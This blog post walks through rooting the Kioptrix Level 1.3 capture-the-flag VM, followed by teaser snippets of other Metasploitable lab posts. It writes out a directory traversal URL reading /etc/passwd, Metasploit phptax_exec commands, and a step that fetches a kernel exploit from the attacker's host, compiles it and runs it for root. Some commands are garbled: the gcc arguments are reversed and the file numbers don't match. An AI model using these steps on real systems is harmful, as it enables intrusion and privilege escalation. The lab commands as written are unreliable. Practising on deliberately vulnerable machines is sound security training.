Chuyển đến nội dung chính

Hack the Kioptrix VM (CTF Challenge)

Today we going to solve Kioptrix: Level 1.3 (#4). It is Boot2Root series provided for practice. Hints we have from author are :
  • It’s possible to remotely compromise the machine
  • Stays within the target audience of this site
  • Must be “realistic” (well kinda…)
  • Should serve as a refresher for me. Be it PHP or MySQL usage etc.
So basically, its security level is from beginner to intermediate. Lets try to break through it. But before please note that you can download it from à https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
WalkThrough
As always start off by finding the target.
netdiscover

And so our target is 192.168.0.101. We will now scan it via nmap.
nmap –p- -A 192.168.0.101

With the result of nmap you can see that service of HTTP is running on two ports i.e. 80 and 8080 along with the service of SSH on 22 port. As we have HTTP service running we should try and open it in our browser.
There is nothing on the webpage except it says “it works!”, let’s have a look on its source code.

In its source code there is URL mentioned i.e. pChart2.1.3/index.php. Open this URL.

And so the ULR opens an it takes us to php library. pChart is basically PHP library that helps us to create or manage anti-aliased charts or pictures directly from the web-server. I searched google more to learn about it and stumbled upon some useful information i.e. this version of pCharts was vulnerable. Therefore, I  searched for its exploit on exploit-db.com.
And so I found an appropriate exploit. When you explore the exploit there is a link given :
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
I opened this link except I used the VM’s IP and found the following page :

The information on this page isn’t useful at all. Then I remembered that http service was opened on 8080 port too. So I opened the IP on the port 8080.
But the access was forbidden. I tried to very method to bypass this forbidden access but nothing worked other than user agent. So to access this page go to Tools menu from the menu bar. A drop down menu will appear. From this menu select Default User Agent. Another menu will open and from this select Internet Explorer, from this another menu will open and from it select Internet Explorer 6.
And fortunately we have the access to the page. And found file called phptax/

Now open this link and you will have the following page :

The page was of phptax. Phptax is a kind of CMS for linux. Its aim is to develop a tax program which uses databaseless methodology that fits in one line text files. Using the Phptax does not requires SQL databases that are generally used in this program. And to our luck there a exploit of Phptax in metsapsloit, for that simply type search phptax  in metasploit.
To use this exploit simply type the following in metasploit :
use exploit/multi/http/phptax_exec
set rhost 192.168.0.101
set rport 8080
exploit
After this, you wil directly reach the shell then type :
id
uname -a         
These above commands are used to know the id and the version of Kernel.

There is a exploit for this version of kernel in exploit-db.com. Download it and save the file as shown :

Next, type the following command to get the exploit from its by default location :
fetch http://192.168.0.104/28818.c
Here, we used fetch command because wget command wasn’t working as its security level here was a bit high. So, using fetch is an substitute for wget command and so we are directly using it from the browser.
Then type the following set of commands to execute the exploit :
ls
gcc –o 28718.c kernel
ls
chmod 777 exploit
./exploit
As the exploit executes you will reach the root. And to confirm this type :
id
Then moving forward go to the root folder by typing :
cd /root
Let’s see what directories it has and for that type :
ls
Here we have a congrats.txt named text file and I am hoping this will be our flag so to read it type :
cat congrats.txt


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm